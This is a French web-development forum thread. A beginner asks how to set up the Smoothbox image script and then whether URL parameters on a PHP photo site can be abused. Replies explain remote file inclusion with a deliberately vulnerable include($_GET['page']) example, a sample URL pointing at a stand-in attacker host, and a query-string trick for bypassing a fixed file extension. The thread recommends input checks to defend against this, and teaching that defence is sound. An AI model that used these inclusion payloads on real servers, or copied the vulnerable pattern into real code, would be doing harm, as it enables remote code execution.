tout le monde !
J'aimerais bien utiliser "Smoothbox" pour afficher les photos de mon site en taille réelle (pour l'instant, j'ai juste la photo qui s'affiche en grand mais j'aimerais mettre une petite animation pour faire plus "pro"
).
Seulement, je ne sais pas comment faire pour utiliser cette option.
Le site qui explique comment faire (si il l'explique...) est en anglais et déjà la programmation expliquée en français me donne parfois du fil à retordre alors en anglais je vous explique pas...
http://gueschla.com/labs/smoothbox/
Je voulais donc vous demander si vous pouviez m'expliquer (le plus détaillé possible) comment faire pour que cela fonctionne (ou mettre les fichiers téléchargés, que changer dans le code source, etc...)
Je vous remercie d'avance ! Vos réponses me serais d'une aide précieuse... ![]()
Tu fous le js ou tu veux, du moment ou tu fais un lien dessus : <script src="url de la page" type="text/javascript"></script>
L'image devrait (si je ne dis pas de connerie) se trouver dans le même dossier que la page html (dans le js y'a un $('TB_load').innerHTML = "<img src='loading.gif' />", tu peux le modifier ^^)
Quant au code html à utiliser dans la page, tu as des exemples d'illustrations ![]()
pour ta réponse mais je n'ai pas réussi à faire fonctionner le script
Je vais donc utiliser une seule page normale qui affichera la photo agrandie...
Par contre, j'aurais une petite question :
Est-ce que si j'utilise des liens du type http://www.monsite.com/infos.php?jour=27&amp;mois=07&amp;annee=2003&amp;titre=Informations (le lien viens du site du zero
) une personne mal intentionnée pourrait changer les variables et ainsi lancer des scripts PHP afin de hacker mon site ou réaliser des actions illégales à mon insu ??
Si oui, est-ce qu'une méthode plus sécurisée existe
d'avance pour vos réponses ! ![]()
"Je vais donc utiliser une seule page normale qui affichera la photo agrandie...
" > ben oui c'est plus simple...(ironique). Il n'y a aucune difficulté pourtant.
Toute données provenant des utilisateurs doivent être vérifiées. Des Failles, y'en existent tout un tas. Les méthodes de sécurisation sont différent suivant ce que l'ont veut sécuriser.
Il n'y a aucune difficulté pourtant.
Je n'arrive pas à faire démarrer le script, je ne comprends pas pourquoi... j'ai fait ce que tu m'as indiqué...
Est-ce qu'il est possible de masquer tout ce qu'il y a après les points d'interrogation dans la barre de liens ??
Dans le code html de la page d'exemples :
<script type="text/javascript"
src="http://gueschla.com/labs/smoothbox/smoothbox.
js"></script>
<link rel="stylesheet"
href="http://gueschla.com/labs/smoothbox/smoothbox
.css" type="text/css" media="screen" />
Dans un exemple :
<a
href="http://gueschla.com/labs/smoothbox/images/pl
ant1.jpg" title="add a caption to title attribute / or leave blank" class="smoothbox" rel="gallery-plants"><img
src="http://gueschla.com/labs/smoothbox/images/pla
nt1_t.jpg" alt="plant 1" /></a>
A partir de là, si tu copie ça, ça doit fonctionner...
Pour ta question : oui, en passant pas du POST au lieu du GET mais c'est plus contraignat.
Même en copiant ce que tu as mis sur le forum, ça ne fonctionne pas : ça m'affiche uniquement l'image sur un fond blanc comme si il n'y avait rien de spécial...
Pour le POST au lieu du GET, est-ce qu'ont peut l'utiliser autre part que dans un formulaire ? Parce que moi j'aimerais l'utiliser pour un lien hypertexte mais ça ne fonctionne pas quand je met POST à la place de GET
Est-ce que quelqu'un pourrait m'eclairer sur ma question ?
d'avance ! ![]()
Ben passe par du GET ![]()
Ca se sécurise, dans le sens ou tu as "juste" à faire un contrôle sur les variables : type de données, valeurs [...]
En fait, ce que j'aimerais, c'est que les variables ne soient pas modifiables dans la barre d'adresses. Elles sont automatiquement définies et ne doivent pas pouvoir être changées manuellement (car c'est une faille à la sécurité).
J'ai fait une page qui regroupe pleins de photos et lorsqu'on clique sur une miniature, un lien hypertexte renvoie les données nécessaires (dans des variables) afin d'afficher la photo taille réelle sur une autre page.
Exemple de lien (page miniatures):
<a
href="Agrandir.php?dossier=chemin_du_dossier&p
hoto=nom_de_la_photo&theme=theme_de_la_photo">
<img src="chemin_de_la_photo" alt=""/></a>
Est-ce que je peux utiliser le POST (sans formulaire) afin que mes variables ne soient pas modifiables
Sinon, y a-t-il un autre moyen sécurisé
PS : Toutes les valeurs de mes variables sont dans une base de données, aucune intervention de l'utilisateur n'est nécéssaire... ![]()
$_GET['dossier'] = test avec is_dir, et si tu sais que tu n'auras pas à naviguer entre des sous dossier, tu fait un str_replace('/', '', $variabledir) avec ton test.
$_GET['nom_de_la_photo'] = file_exists + getimagesizze (pour savoir si c'est une image ou pas)
et le reste dans le même genre. Si tu ne te met pas à tafer comme ça, tu vas vite te restreindre pour la suite ![]()
Est-ce que tu aurais un site qui explique comment faire parce que ça ce n'est pas sur le site du zéro...
En fait, sur la page qui affiche les photos taille réelles, il faut vérifier que les nom inscrits dans les variables existent dans ma base de données et si oui, ont affiche, sinon ont ne fait rien ![]()
http://fr3.php.net/manual/fr/function.is-dir.php
http://fr3.php.net/manualal/fr/function.file-exists.php
http://fr3.php.net/manuall/fr/function.getimagesize.php
Oui pour ta question.
Cool merci !
Je vais essayer de faire ça...
Dernière question (j'espère...
) : Je fais les tests avec un if et si toutes les conditions sont remplies j'affiche ma photo. Si elle ne le sont pas, je dois faire quoi pour empêcher une personne de pouvoir utiliser mon site à des fins non légales
Pour empêcher ça par exemple :
Si l'url contient index.php?page=minichat, alors on incluera minichat.php
Si l'url contient index.php?page=news, alors on incluera news.php
Si l'url contient index.php?page=forum, alors on incluera forum.php
Si l'url contient
index.php?page=http://www.hacker.com/pagespeciale,
alors on incluera http://www.hacker.com/pagespeciale.php
Euh, attends une minute là, tu peux m'expliquer le dernier exemple ? o_O
Oui, je crois que des explications s'imposent... Regardez en haut de cette page web, vous pouvez modifier facilement l'url, donc modifier facilement la page qui sera incluse !!! Et vu le code PHP qui a été utilisé, on peut très facilement inclure une page située sur un autre site ! Du coup, en modifiant juste l'url de la page, PHP va exécuter cette instruction :
<?php
include("http://www.hacker.com/pagespeciale.php");
?>
Qu'est-ce qu'on risque ? C'est simple, je n'ai qu'à modifier l'url pour mettre l'adresse d'un fichier PHP sur un FTP à moi, et c'est VOTRE serveur qui exécutera le code de ma page (pagespeciale.php).
" je dois faire quoi pour empêcher une personne de pouvoir utiliser mon site à des fins non légales
" > si tu fous une page blanche quand c'est pas bon, je ne vois pas comment il pourrait l'utiliser à des fins illégaux
Imagine :
$mapage = $_GET["page"];
include($mapage.".php");
index.php?page=toto > va inclure toto.php
index.php?page=tutu > va inclure tutu.php
index.php?page=toto/titi > va inclure toto/titi.php
index.php?page=http://une_page_piegée > va inclure http://une_page_piegée.php
A partir du moment ou tu testes si $mapage.".php" est un fichier qui existe sur ton serveur (file_exists), tu ne risques presque plus rien.
Excusez-moi pour le double post mais cette question de sécurité me travaille...
En fait, dans mon code PHP, aucune variable ne contient d'extensions (celle-ci est statique et est ".jpg"). De ce fait, je me posais cette question : si une personne indique à la place de mes variables le nom d'un script .php par exemple, celui-ci sera forcément terminé en ".php.jpg".
Donc est-ce qu'il est quand même possible d'exécuter un script à mon insu ?
Ok !
Merci deepblue pour ta patience et tes réponses ! ![]()
Lis ce que j'écris... http://fr3.php.net/manualal/fr/function.file-exists.php
Par ailleurs "celui-ci sera forcément terminé en ".php.jpg"" c'est faux : monfichier.php?.jpg
Ah, grillé avant que je post ![]()